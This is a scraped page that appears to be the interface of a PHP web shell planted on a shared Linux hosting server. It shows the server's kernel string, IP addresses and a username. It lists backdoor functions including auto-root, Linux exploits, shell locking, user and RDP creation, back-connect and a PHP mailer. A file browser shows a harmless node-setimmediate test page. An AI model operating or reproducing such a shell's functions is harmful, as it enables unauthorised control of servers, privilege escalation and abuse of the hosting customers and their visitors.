Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-setimmediate /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
614
B
-rw-r--r--
selfClose.htm
345
B
-rw-r--r--
setImmediate.js
6.37
KB
-rw-r--r--
tests.js
1.27
KB
-rw-r--r--
worker.js
93
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : selfClose.htm
<!DOCTYPE html> <html> <head> <title>Modal Dialog for Testing</title> </head> <body> <p>This'll be gone in one second; we're just testing the interaction of setImmediate and <code>window.showModalDialog</code>.</p> <script> setTimeout(function () { window.close(); }, 1000); </script> </body> </html>
Close